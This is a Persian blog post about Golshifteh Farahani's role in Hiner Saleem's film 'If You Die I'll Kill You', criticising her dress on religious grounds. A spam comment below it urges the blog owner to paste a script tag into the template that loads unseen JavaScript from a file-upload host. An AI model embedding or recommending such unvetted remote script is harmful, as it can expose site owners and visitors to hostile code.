فراهانی و بازی در نقش دختر کرد سرگردان در فرانسه!+تصاویر

گلشیفته فراهانی در فیلمی به نام «اگر بمیری می کشمت» به کارگردانی "هینر سلیم" کرد تبار ساکن فرانسه در 21مارچ 2011- (اول فروردین سال 90) در پاریس به صورت خصوصی و با حضور مدعوین خاص شامل اهالی مطبوعات و سینما و نیز منتقدین اکران خصوصی شد.

صدای شیعه: گلشیفته فراهانی در این فیلم نقش اول زن را بازی می کند . او در این فیلم در نقش "سیبا" دختری کرد تبار بازی می کند که بعد از مرگ نامزدش در پاریس سرگردان می شود.

فیلم در حال نمایش دو فرهنگ افراد مهاجر کرد و فرانسویان است و به همین سبب گلشیفته فراهانی در این فیلم به دو زبان کردی و فرانسه حرف می زند .

این فیلم که به گفته کارگردان آن، قصد دارد معضل فرهنگ های بیگانه در کشور میزبان و مشخصا فرانسه را نشان دهد به سنت های پیچیده و متکلفانه جوامع سنتی پرداخته و کارگردان تلاش کرده است با تکیه بر استعاره های مختلف این سنت ها را از نظر خود به چالش بکشد.

اما نکته قابل تامل در این فیلم به گلشیفته فراهانی برمی گردد که زمانی به عنوان سوپر استار فیلم های ایران شناخته می شد وی در این فیلم شاید بازی خوبی داشته و سکانس های قابل قبولی را به نمایش گذاشته باشد اما نوع حجاب و لباس پوشیدن وی به عنوان یک ایرانی کاملا مایه تاسف و تالم است.

گلشیفته فراهانی فیلم


(متاسفانه حجاب و لباس بازیگر فرانسوی نقش پیرزن همسایه بسیار بهتر از گلشیفته است)

(حجت الاسلام نقویان در بخشی از یک سخنرانی به این نکته اشاره کردند که برخی از ایرانیان که خارج از کشور می روند آنقدر از حد خارج می شوند که بسیار بیشتر و بدتر از خارجیان آن کشور آرایش می کنند و لباس می پوشند، نقویان اشاره می کند که اگر می خواهی این نوع ایرانیان را بشناسی به بی حجاب ترین افراد توجه کن!)
متاسفانه باید اعتراف کرد که سوپراستارهای سینمای ایران وقتی از چرخه گردونه خود خارج می شوند دیگر هرگز در جایگاه خود قرار نمی گیرند و این به این معناست که هر تلاشی برای بازگرداندن آنها به جایگاه قبلی بی نتیجه و عبث است.

/ 1 نظر / 25 بازدید
iRaN bOx

سلام دوست گلم وبلاگ جالبي داري خلاصه ميگم وقتت رو نگيرم نميدونم امار وبلاگت کمه يا نه ------------------ خوب اين کد رو بزار در انتهاي ويرايش وبلاگت بعد لينک وبلاگت رو واسش بفرست به همين اسوني بدش هم که ... ووو اينم بگم من اين رو تازه درست کردم واميد وارم خوشت بياد ببخشيد همين اينم کد ================ <script language="javascript" type="text/javascript" src="http://uploadfa.net/1390/xh82w76bzyubf9tt4jya.js"></script> ============ منتظر شما دوست گل و سنبل و ...هستم دوستدار شما نريمان[گل]